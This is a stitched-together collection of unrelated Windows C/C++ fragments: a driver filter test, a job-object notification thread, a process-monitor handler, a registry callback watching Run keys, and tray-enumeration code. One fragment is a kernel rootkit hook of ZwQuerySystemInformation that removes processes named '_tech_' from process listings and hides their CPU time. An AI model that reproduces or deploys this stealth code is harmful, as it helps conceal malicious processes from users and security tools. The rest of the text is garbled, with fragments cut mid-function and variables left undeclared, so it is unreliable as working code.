if (ienum > sizeof(FltArr) / sizeof(FltArr[0]))
{
Log.AddToLog(L"Filter's count mismatch!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
if (FltArr[ienum] != pFlt->m_FilterID)
{
Log.AddToLog(L"Filter's order mismatch!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
ienum++;
}
} while (TRUE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)));
}
}
if (_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags)
{
Log.AddToLog(L"further filter's check skipped - errors...");
}
else
{
Log.AddToLog(L"checking enable/disable...");
pFlt->m_FilterID = FltArr[2];
pFlt->m_FltCtl = FLTCTL_DISABLE_FILTER;
if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)))
{
Log.AddToLog(L"Disable filter failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
pFlt->m_FltCtl = FLTCTL_ENABLE_FILTER;
if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)))
{
Log.AddToLog(L"Enable filter failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
Log.AddToLog(L"checking delete/reset...");
ResetEvent(hEventAppear);
pFlt->m_FltCtl = FLTCTL_DEL;
if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)))
{
Log.AddToLog(L"Delete filter failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
pFlt->m_FltCtl = FLTCTL_RESET_FILTERS;
if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)))
{
Log.AddToLog(L"Reset filter failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
if (WAIT_OBJECT_0 != WaitForSingleObject(hEventAppear, 1000 * 60 * 3)) // 3 min
{
Log.AddToLog(L"Error: change filter's queue not detected!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
}
}
#define _flt_timeout 20 /*sec*/
Log.AddToLog(L"checking filter with timeout...");
FILETIME STasFT;
ULARGE_INTEGER ExpTime;
GetSystemTimeAsFileTime(&STasFT);
ExpTime.LowPart=STasFT.dwLowDateTime;
ExpTime.HighPart=STasFT.dwHighDateTime;
STasFT.dwLowDateTime=_flt_timeout;
ExpTime.QuadPart=ExpTime.QuadPart+(LONGLONG)STasFT.dwLowDateTime * 6000000; //600000000
ULONG FltTimeout = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_INFO,
FLTTYPE_FLT, 0, 0, *((__int64*)&ExpTime), PreProcessing, NULL, NULL);
if (FltTimeout == 0)
{
Log.AddToLog(L"Error: add filter with timeout failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
pSingleParam->ParamFlags = _SINGLE_PARAM_FLAG_NONE;
pSingleParam->ParamID = _PARAM_OBJECT_URL_W;
lstrcpy((PWCHAR)pSingleParam->ParamValue, L"this is test filter with timeout...");
pSingleParam->ParamSize = (lstrlen((PWCHAR)pSingleParam->ParamValue) + 1) * sizeof(WCHAR);
if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict))
{
Log.AddToLog(L"Error: check filter with timeout failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
Sleep((_flt_timeout + 1) * 1000);
lstrcpy((PWCHAR)pSingleParam->ParamValue, L"Error: filter with timeout is present in queue after timeout!");
pSingleParam->ParamSize = (lstrlen((PWCHAR)pSingleParam->ParamValue) + 1) * sizeof(WCHAR);
if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict))
{
Log.AddToLog(L"Error: check filter with timeout failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
}
}
while ((pEvt = gDrvEventList.GetFirst()) != NULL)
{
Log.AddToLog((PEVENT_TRANSMIT) pEvt);
gDrvEventList.Free(pEvt);
}
// params and cache
#define _test_params 20
BYTE pbParams[_test_params][sizeof(FILTER_PARAM) + 0x100];
ZeroMemory(pbParams, sizeof(pbParams));
if (!(_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags))
{
PFILTER_PARAM pArrFltParam[_test_params];
// dword - FLT_PARAM_AND, FLT_PARAM_EUA, FLT_PARAM_ABV, FLT_PARAM_BEL, FLT_PARAM_MORE, FLT_PARAM_LESS, FLT_PARAM_MASK, FLT_PARAM_EQU_LIST
// string - FLT_PARAM_WILDCARD
#define FltParam(_idx, _type, _value) { pArrFltParam[_idx] = (PFILTER_PARAM) pbParams[_idx];\
pArrFltParam[_idx]->m_ParamFlags = _FILTER_PARAM_FLAG_CACHABLE;\
pArrFltParam[_idx]->m_ParamFlt = _idx;\
pArrFltParam[_idx]->m_ParamID = _idx;\
pArrFltParam[_idx]->m_ParamSize = sizeof(_type);\
*(_type*)(pArrFltParam[_idx]->m_ParamValue) = _value;}
FltParam(FLT_PARAM_AND, BYTE, 1);
FltParam(FLT_PARAM_ABV, DWORD, 50001);
FltParam(FLT_PARAM_BEL, DWORD, 50001);
FltParam(FLT_PARAM_MORE, DWORD, 0x2000003);
FltParam(FLT_PARAM_LESS, DWORD, 0x2000003);
ULONG FltTimeout = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 5, FLT_A_INFO | FLT_A_SAVE2CACHE | FLT_A_USECACHE | FLT_A_RESETCACHE,
FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL,
pArrFltParam[FLT_PARAM_AND], pArrFltParam[FLT_PARAM_ABV],
pArrFltParam[FLT_PARAM_BEL], pArrFltParam[FLT_PARAM_MORE], pArrFltParam[FLT_PARAM_LESS],
NULL);
if (FltTimeout == 0)
{
Log.AddToLog(L"Error: add filter with parameters failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
VERDICT VerdictOk, VerdictBad;
pSingleParam->ParamFlags = _SINGLE_PARAM_FLAG_NONE;
#define _check_flt_op(_str, _op, _type, _val1, _val2) Log.AddToLog(L"Checking flt op " _str L"...");\
pSingleParam->ParamID = _op;\
*(_type*)pSingleParam->ParamValue = _val1;\
pSingleParam->ParamSize = sizeof(_type);\
if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, TRUE, &VerdictOk))\
VerdictOk = Verdict_Debug;\
*(_type*)pSingleParam->ParamValue = _val2;\
if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, TRUE, &VerdictBad))\
VerdictBad = Verdict_Debug;\
if (VerdictOk != Verdict_Pass || VerdictBad != Verdict_NotFiltered)\
{\
Log.AddToLog(L"Flt operation" _str L" returned bad result");\
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);\
}
//+ ----------------------------------------------------------------------------------------
_check_flt_op(L"AND", FLT_PARAM_AND, BYTE, 1, 2);
//+ ----------------------------------------------------------------------------------------
_check_flt_op(L"ABV", FLT_PARAM_ABV, DWORD, 50001, 50000);
//+ ----------------------------------------------------------------------------------------
_check_flt_op(L"BEL", FLT_PARAM_BEL, DWORD, 50001, 50002);
//+ ----------------------------------------------------------------------------------------
_check_flt_op(L"MORE", FLT_PARAM_MORE, DWORD, 0x2000003, 0x2000004);
//+ ----------------------------------------------------------------------------------------
_check_flt_op(L"LESS", FLT_PARAM_LESS, DWORD, 0x2000003, 0x2000002);
}
}
if (!(_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags))
{
pFlt->m_FltCtl = FLTCTL_RESET_FILTERS;
if (FALSE == IDriverFilterTransmit(FltJob.m_hDevice, pFlt, pFlt, sizeof(FltTransmit), sizeof(FltTransmit)))
{
Log.AddToLog(L"Reset filter failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
}
if (!(_ERR_DRVFAULT_FLT & gDrvEventList.m_ErrorFlags))
{
PFILTER_PARAM pCacheParam = (PFILTER_PARAM) pbParams;
pCacheParam->m_ParamFlags = _FILTER_PARAM_FLAG_CACHABLE;
pCacheParam->m_ParamFlt = FLT_PARAM_WILDCARD;
pCacheParam->m_ParamID = _PARAM_OBJECT_URL_W;
lstrcpy((PWCHAR)pCacheParam->m_ParamValue, L"*");
pCacheParam->m_ParamSize = (lstrlen((PWCHAR)pCacheParam->m_ParamValue) + 1) * sizeof(WCHAR);
ULONG FltCache = AddFSFilter2(FltJob.m_hDevice, FltJob.m_AppID, gpModuleName, 0, FLT_A_POPUP | FLT_A_SAVE2CACHE | FLT_A_USECACHE,
FLTTYPE_FLT, 0, 0, 0, PreProcessing, NULL, pCacheParam, NULL);
if (!FltCache)
{
Log.AddToLog(L"Error: can't add filter for checking cache!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
VERDICT Verdict1, Verdict2;
pSignleEvt->ProcessingType = PreProcessing;
pSingleParam->ParamFlags = _SINGLE_PARAM_FLAG_NONE;
pSingleParam->ParamID = _PARAM_OBJECT_URL_W;
lstrcpy((PWCHAR)pSingleParam->ParamValue, L"check cache (must be one such string in log!)");
pSingleParam->ParamSize = (lstrlen((PWCHAR)pSingleParam->ParamValue) + 1) * sizeof(WCHAR);
if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict1))
{
Log.AddToLog(L"Error: check driver cache!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
if (FALSE == IDriverFilterEvent(FltJob.m_hDevice, pSignleEvt, FALSE, &Verdict2))
{
Log.AddToLog(L"Error: check driver cache (second event)!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
else
{
if ((Verdict1 != Verdict_Pass) || (Verdict2 != Verdict_Pass))
{
Log.AddToLog(L"Error: check driver cache failed!");
gDrvEventList.SetError(_ERR_DRVFAULT_FLT);
}
}
}
}
}
FltJob.ChangeActiveStatus(false);
while ((pEvt = gDrvEventList.GetFirst()) != NULL)
{
Log.AddToLog((PEVENT_TRANSMIT) pEvt);
gDrvEventList.Free(pEvt);
}
}
}
#endif
//-
//- ----------------------------------------------------------------------------------------
Log.AddToLog(L"\nTest finished.");
if (gDrvEventList.m_Errors)
{
WCHAR err[128];
wsprintf(err, L"Errors %d, mask %x", gDrvEventList.m_Errors, gDrvEventList.m_ErrorFlags);
Log.AddToLog(err);
return gDrvEventList.m_ErrorFlags;
}
Log.AddToLog(L"\n\nNo errors.");
return 0;
}
/* This function is launched in a separate thread and waits for
* a message from a completion port associated with a job.
*/
DWORD WINAPI JobNotify(PVOID)
{
TCHAR sz[2000];
BOOL fDone = FALSE;
while (!fDone)
{
DWORD dwBytesXferred;
ULONG_PTR CompKey;
LPOVERLAPPED po;
/* Attempts to dequeue an I/O completion packet
* from the specified I/O completion port.
* If there is no completion packet queued, the function
* waits for a pending I/O operation associated with the completion port to complete.
*
* To dequeue multiple I/O completion packets at once,
* use the GetQueuedCompletionStatusEx function
*
* CompletionPort [in]
* A handle to the completion port. To create a completion port,
* use the CreateIoCompletionPort function.
*
* lpNumberOfBytes [out]
* A pointer to a variable that receives the number of bytes
* transferred during an I/O operation that has completed
*
* lpCompletionKey [out]
* A pointer to a variable that receives the completion key value
* associated with the file handle whose I/O operation has completed.
* A completion key is a per-file key that is specified in a call to CreateIoCompletionPort.
*
* lpOverlapped [out]
* A pointer to a variable that receives the address of the
* OVERLAPPED structure that was specified when the completed I/O operation was started.
*
* dwMilliseconds [in]
* The number of milliseconds that the caller is willing to wait
* for a completion packet to appear at the completion port.
* If a completion packet does not appear within the specified time,
* the function times out, returns FALSE, and sets *lpOverlapped to NULL.
*
* If dwMilliseconds is INFINITE, the function will never time out.
* If dwMilliseconds is zero and there is no I/O operation to dequeue,
* the function will time out immediately.
*/
GetQueuedCompletionStatus(
g_hIOCP,
&dwBytesXferred,
&CompKey,
&po,
INFINITE);
/* The app is shutting down, exit this thread */
fDone = (CompKey == COMPKEY_TERMINATE);
HWND hwndLB = FindWindow(NULL, TEXT("Job Lab"));
hwndLB = GetDlgItem(hwndLB, IDC_STATUS);
if (CompKey == COMPKEY_JOBOBJECT)
{
_tcscpy_s(sz, _countof(sz), TEXT("--> Notification: "));
PTSTR psz = sz + _tcslen(sz);
switch (dwBytesXferred)
{
/* We have reached an event when job time was reached */
case JOB_OBJECT_MSG_END_OF_JOB_TIME:
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Job time limit reached"));
break;
/* The time allowed for process in the job is exceeded.
* So we get process name from the overlapped structure.
*/
case JOB_OBJECT_MSG_END_OF_PROCESS_TIME:
{
TCHAR szProcessName[MAX_PATH];
/* po is a process identifier. */
GetProcessName(
PtrToUlong(po),
szProcessName,
MAX_PATH);
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Job process %s (Id=%d) time limit reached"),
szProcessName,
po);
}
break;
case JOB_OBJECT_MSG_ACTIVE_PROCESS_LIMIT:
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Too many active processes in job"));
break;
case JOB_OBJECT_MSG_ACTIVE_PROCESS_ZERO:
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Job contains no active processes"));
break;
case JOB_OBJECT_MSG_NEW_PROCESS:
{
TCHAR szProcessName[MAX_PATH];
GetProcessName(
PtrToUlong(po),
szProcessName,
MAX_PATH);
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("New process %s (Id=%d) in Job"),
szProcessName,
po);
}
break;
case JOB_OBJECT_MSG_EXIT_PROCESS:
{
TCHAR szProcessName[MAX_PATH];
GetProcessName(
PtrToUlong(po),
szProcessName,
MAX_PATH);
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Process %s (Id=%d) terminated"),
szProcessName,
po);
}
break;
case JOB_OBJECT_MSG_ABNORMAL_EXIT_PROCESS:
{
TCHAR szProcessName[MAX_PATH];
GetProcessName(
PtrToUlong(po),
szProcessName,
MAX_PATH);
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Process %s (Id=%d) terminated abnormally"),
szProcessName,
po);
}
break;
case JOB_OBJECT_MSG_PROCESS_MEMORY_LIMIT:
{
TCHAR szProcessName[MAX_PATH];
GetProcessName(
PtrToUlong(po),
szProcessName,
MAX_PATH);
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Process (%s Id=%d) exceeded memory limit"),
szProcessName,
po);
}
break;
case JOB_OBJECT_MSG_JOB_MEMORY_LIMIT:
{
TCHAR szProcessName[MAX_PATH];
GetProcessName(
PtrToUlong(po),
szProcessName,
MAX_PATH);
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Process %s (Id=%d) exceeded job memory limit"),
szProcessName,
po);
}
break;
default:
StringCchPrintf(
psz,
_countof(sz) - _tcslen(sz),
TEXT("Unknown notification: %d"),
dwBytesXferred);
break;
}
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
/* Force a status update when a notification arrives */
CompKey = 1;
}
if (CompKey == COMPKEY_STATUS)
{
static int s_nStatusCount = 0;
StringCchPrintf(
sz,
_countof(sz),
TEXT("--> Status Update (%u)"),
s_nStatusCount++);
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
/* Show the basic accounting information */
JOBOBJECT_BASIC_AND_IO_ACCOUNTING_INFORMATION jobai;
g_job.QueryBasicAccountingInfo(&jobai);
StringCchPrintf(
sz,
_countof(sz),
TEXT("Total Time: User=%I64u, Kernel=%I64u ")
TEXT("Period Time: User=%I64u, Kernel=%I64u"),
jobai.BasicInfo.TotalUserTime.QuadPart,
jobai.BasicInfo.TotalKernelTime.QuadPart,
jobai.BasicInfo.ThisPeriodTotalUserTime.QuadPart,
jobai.BasicInfo.ThisPeriodTotalKernelTime.QuadPart);
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
StringCchPrintf(
sz,
_countof(sz),
TEXT("Page Faults=%u, Total Processes=%u, ")
TEXT("Active Processes=%u, Terminated Processes=%u"),
jobai.BasicInfo.TotalPageFaultCount,
jobai.BasicInfo.TotalProcesses,
jobai.BasicInfo.ActiveProcesses,
jobai.BasicInfo.TotalTerminatedProcesses);
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
/* Show the I/O accounting information */
StringCchPrintf(
sz,
_countof(sz),
TEXT("Reads=%I64u (%I64u bytes), ")
TEXT("Write=%I64u (%I64u bytes), Other=%I64u (%I64u bytes)"),
jobai.IoInfo.ReadOperationCount,
jobai.IoInfo.ReadTransferCount,
jobai.IoInfo.WriteOperationCount,
jobai.IoInfo.WriteTransferCount,
jobai.IoInfo.OtherOperationCount,
jobai.IoInfo.OtherTransferCount);
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
/* Show the peak per-process and job memory usage */
JOBOBJECT_EXTENDED_LIMIT_INFORMATION joeli;
g_job.QueryExtendedLimitInfo(&joeli);
StringCchPrintf(
sz,
_countof(sz),
TEXT("Peak memory used: Process=%I64u, Job=%I64u"),
(__int64)joeli.PeakProcessMemoryUsed,
(__int64)joeli.PeakJobMemoryUsed);
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
/* Show the set of Process IDs */
DWORD dwNumProcesses = 50;
DWORD dwProcessIdList[50];
g_job.QueryBasicProcessIdList(
dwNumProcesses,
dwProcessIdList,
&dwNumProcesses);
StringCchPrintf(
sz,
_countof(sz),
TEXT("PIDs: %s"),
(dwNumProcesses == 0) ? TEXT("(none)") : TEXT(""));
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
TCHAR szProcessName[MAX_PATH];
for (DWORD x = 0; x < dwNumProcesses; x++)
{
GetProcessName(
dwProcessIdList[x],
szProcessName,
_countof(szProcessName));
StringCchPrintf(
sz,
_countof(sz),
TEXT(" %d - %s"),
dwProcessIdList[x],
szProcessName);
ListBox_SetCurSel(hwndLB, ListBox_AddString(hwndLB, sz));
}
}
}
return(0);
}
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS rc;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("BHWIN: NewZwQuerySystemInformation() from %s\n", aProcessName);
rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
DbgPrint(" real ZwQuerySystemInfo returned %d", rc);
if( NT_SUCCESS( rc ) )
{
// double check the process name, if it starts w/ '_tech_' DO NOT
// apply any stealth
if(0 == memcmp(aProcessName, "_tech_", 6))
{
DbgPrint("rootkit: detected system query from _tech_ process\n");
}
else if( 5 == SystemInformationClass )
{
// this is a process list, look for process names that start with
// '_tech_'
int iChanged = 0;
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
//struct _SYSTEM_PROCESSES *next = ((char *)curr += curr->NextEntryDelta);
ANSI_STRING process_name;
RtlUnicodeStringToAnsiString( &process_name, &(curr->ProcessName), TRUE);
if( (0 < process_name.Length) && (255 > process_name.Length) )
{
if(0 == memcmp( process_name.Buffer, "_tech_", 6))
{
//////////////////////////////////////////////
// we have a winner!
//////////////////////////////////////////////
char _output[255];
char _pname[255];
memset(_pname, 0, 255);
memcpy(_pname, process_name.Buffer, process_name.Length);
DbgPrint( "rootkit: hiding process, pid: %d\tname: %s\r\n",
curr->ProcessId,
_pname);
iChanged = 1;
m_UserTime.QuadPart += curr->UserTime.QuadPart;
m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
if(prev)
{
if(curr->NextEntryDelta)
{
// make prev skip this entry
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
// we are last, so make prev the end
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
// we are first in the list, so move it forward
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
// we are the only process!
SystemInformation = NULL;
}
}
}
}
else
{
//add the times of _root_* processes to the idle process
curr->UserTime.QuadPart += m_UserTime.QuadPart;
curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
RtlFreeAnsiString(&process_name);
if (0 == iChanged)
prev = curr;
else
iChanged = 0;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
else if (8 == SystemInformationClass) //SystemProcessorTimes
{
struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
}
}
return rc;
}
//
// Implements an event method
//實現一個事件方法
//
virtual void OnProcessEvent(
PQUEUED_ITEM pQueuedItem,
PVOID pvParam
)
{
TCHAR szFileName[MAX_PATH];
//
// Deliberately I decided to put a delay in order to
// demonstrate the queuing / multithreaded functionality
//故意,我決定把以延遲
//演示排隊/多線程功能
//
::Sleep(500);
//
// Get the dummy parameter we passsed when we
// initiated process of monitoring (i.e. StartMonitoring() )
//獲取參數,我們passsed當我們的假人
//啟動監測進程(即StartMonitoring())
//
CWhatheverYouWantToHold* pParam = static_cast<CWhatheverYouWantToHold*>(pvParam);
//
// And it's about time to handle the notification itself
//它的時間來處理的通知本身
//
if (NULL != pQueuedItem)
{
TCHAR szBuffer[1024];
::ZeroMemory(
reinterpret_cast<PBYTE>(szBuffer),
sizeof(szBuffer)
);
GetProcessName(
reinterpret_cast<DWORD>(pQueuedItem->hProcessId),
szFileName,
MAX_PATH
);
if (pQueuedItem->bCreate)
{
//
// At this point you can use OpenProcess() and
// do something with the process itself
//此時,您可以使用OpenProcess()和
//執行過程中的東西本身
//
wsprintf(
szBuffer,
TEXT("Process has been created: PID=%.8X %s\n"),
pQueuedItem->hProcessId,
szFileName
);
OutputDebugString(szBuffer);
}
else
{
wsprintf(
szBuffer,
TEXT("Process has been terminated: PID=%.8X\n"),
pQueuedItem->hProcessId);
OutputDebugString(szBuffer);
}
//
// Output to the console screen
//輸出到控制台屏幕
//
_tprintf(szBuffer);
} // if
}
NTSTATUS RegistryCallback(IN PVOID CallbackContext,
IN PVOID Argument1,
IN PVOID Argument2)
{
NTSTATUS st=STATUS_SUCCESS;
BOOLEAN exception = FALSE;
BOOLEAN flag;
int type;
UNICODE_STRING registryPath;
UCHAR* registryData = NULL;
ULONG registryDataLength = 0;
ULONG registryDataType = 0;
/* Allocate a large 64kb string ... maximum path name allowed in windows */
registryPath.Length = 0;
registryPath.MaximumLength = NTSTRSAFE_UNICODE_STRING_MAX_CCH * sizeof(WCHAR);
registryPath.Buffer = ExAllocatePoolWithTag(NonPagedPool, registryPath.MaximumLength, REGISTRY_POOL_TAG);
if(registryPath.Buffer == NULL)
{
return STATUS_SUCCESS;
}
//registryEvent.eventType = (REG_NOTIFY_CLASS)Argument1;
type = (REG_NOTIFY_CLASS)Argument1;
try
{
/* Large switch statement for all registry events ... fairly easy to understand */
switch(type)
{
case RegNtPreDeleteKey:
{
PREG_DELETE_KEY_INFORMATION deleteKey = (PREG_DELETE_KEY_INFORMATION)Argument2;
PCM_KEY_BODY my_CM_KEY_BODY=(PCM_KEY_BODY)deleteKey->Object;
GetProcessName(aProcessName);
flag=GetRegistryObjectCompleteName(®istryPath, NULL, deleteKey->Object);
if(flag)
{
RtlUnicodeStringToAnsiString(&astr,®istryPath,TRUE);
DbgPrint("[RegCreated]ProcessID %d KeyName %s!\n",PID,astr.Buffer);
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
RtlFreeAnsiString(&astr);
}
break;
}
case RegNtPreDeleteValueKey:
{
PREG_DELETE_VALUE_KEY_INFORMATION deleteValueKey = (PREG_DELETE_VALUE_KEY_INFORMATION)Argument2;
PCM_KEY_BODY my_CM_KEY_BODY=(PCM_KEY_BODY)deleteValueKey->Object;
GetProcessName(aProcessName);
flag=GetRegistryObjectCompleteName(®istryPath, NULL, deleteValueKey->Object);
if((flag) && (deleteValueKey->ValueName->Length > 0))
{
RtlUnicodeStringCatString(®istryPath,L"\\");
RtlUnicodeStringCat(®istryPath, deleteValueKey->ValueName);
RtlUnicodeStringToAnsiString(&astr,®istryPath,TRUE);
DbgPrint("[RegCreated]ProcessID %d KeyName %s!\n",PID,astr.Buffer);
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
RtlFreeAnsiString(&astr);
}
break;
}
case RegNtPreSetValueKey:
{
PREG_SET_VALUE_KEY_INFORMATION setValueKey = (PREG_SET_VALUE_KEY_INFORMATION)Argument2;
PCM_KEY_BODY my_CM_KEY_BODY=(PCM_KEY_BODY)setValueKey->Object;
GetProcessName(aProcessName);
flag = GetRegistryObjectCompleteName(®istryPath, NULL, setValueKey->Object);
if((flag) && (setValueKey->ValueName->Length > 0))
{
registryDataType = setValueKey->Type;
registryDataLength = setValueKey->DataSize;
registryData = ExAllocatePoolWithTag(NonPagedPool, registryDataLength, REGISTRY_POOL_TAG);
if(registryData != NULL)
{
RtlCopyBytes(registryData,setValueKey->Data,setValueKey->DataSize);
} else {
DbgPrint("RegistryMonitor: ERROR can't allocate memory for setvalue data\n");
}
RtlUnicodeStringCatString(®istryPath,L"\\");
RtlUnicodeStringCat(®istryPath, setValueKey->ValueName);
RtlUnicodeStringToAnsiString(&astr,®istryPath,TRUE);
DbgPrint("[RegCreated]ProcessID %d KeyName %s!\n",PID,astr.Buffer);
if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
else if (strstr(astr.Buffer," \\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
else if (strstr(astr.Buffer," \\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
else if (strstr(astr.Buffer,"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"))
{
st=WaitForUserAnswer();
if (!NT_SUCCESS(st))
return STATUS_INVALID_PARAMETER;
}
RtlFreeAnsiString(&astr);
}
break;
}
default:
break;
}
} except( EXCEPTION_EXECUTE_HANDLER ) {
/* Do nothing if an exception occured ... event won't be queued */
exception = TRUE;
}
if(registryPath.Buffer != NULL)
{
ExFreePoolWithTag(registryPath.Buffer, REGISTRY_POOL_TAG);
}
/* Always return a success ... we aren't doing any filtering, just monitoring */
return STATUS_SUCCESS;
}
tstring Helium::GetProcessString()
{
tostringstream result;
result << GetProcessName() << "_" << GetCurrentProcessId() << "_" << GetCurrentThreadId();
return result.str();
}
int EnumAllVisibleTray_au()
{
wchar_t * pszText = NULL;
DWORD lPID;
int iconIndex = 0,iconNum = 0;
wchar_t cPID[20] = {0};
int i = 0,j = 0;
ICONINFO iconInfo;
wchar_t cProcessName[1024] = L"";
for(i = 0;i<100;i++)
{
if(g_QuickHideAllTray_au[i].trayicon.Reserved[0] == 22
&& g_QuickHideAllTray_au[i].trayicon.Reserved[1] == 33)
{
DestroyIcon(g_QuickHideAllTray_au[i].trayicon.hIcon);
}
g_QuickHideAllTray_au[i].iHasTrayIcon = 0;
g_QuickHideAllTray_au[i].iIconIndex = 0;
g_QuickHideAllTray_au[i].iCommandId = 0;
g_QuickHideAllTray_au[i].hWnd = NULL;
g_QuickHideAllTray_au[i].trayicon.hIcon = NULL;
g_QuickHideAllTray_au[i].trayicon.hwnd = NULL;
g_QuickHideAllTray_au[i].trayicon.uID = 0;
g_QuickHideAllTray_au[i].trayicon.uCallbackMessage = 0;
g_QuickHideAllTray_au[i].bToBk = 0;
g_QuickHideAllTray_au[i].lPID = 0;
g_QuickHideAllTray_au[i].bHide = 0;
g_QuickHideAllTray_au[i].bExist = 0;
memset(g_QuickHideAllTray_au[i].cProcessName,0,30 * sizeof(wchar_t));
memset(g_QuickHideAllTray_au[i].cIconTip,0,1024 * sizeof(wchar_t));
//memset(g_QuickHideAllTray_au[i].cWndTitle,0,2048 * sizeof(wchar_t));
}
GetWindowThreadProcessId(hTrayWnd,&lPID);
CProcessData<TBBUTTON> data(lPID);
TBBUTTON tb = {0};
TRAYDATA tray = {0};
TrayItemInfo tifo = {0};
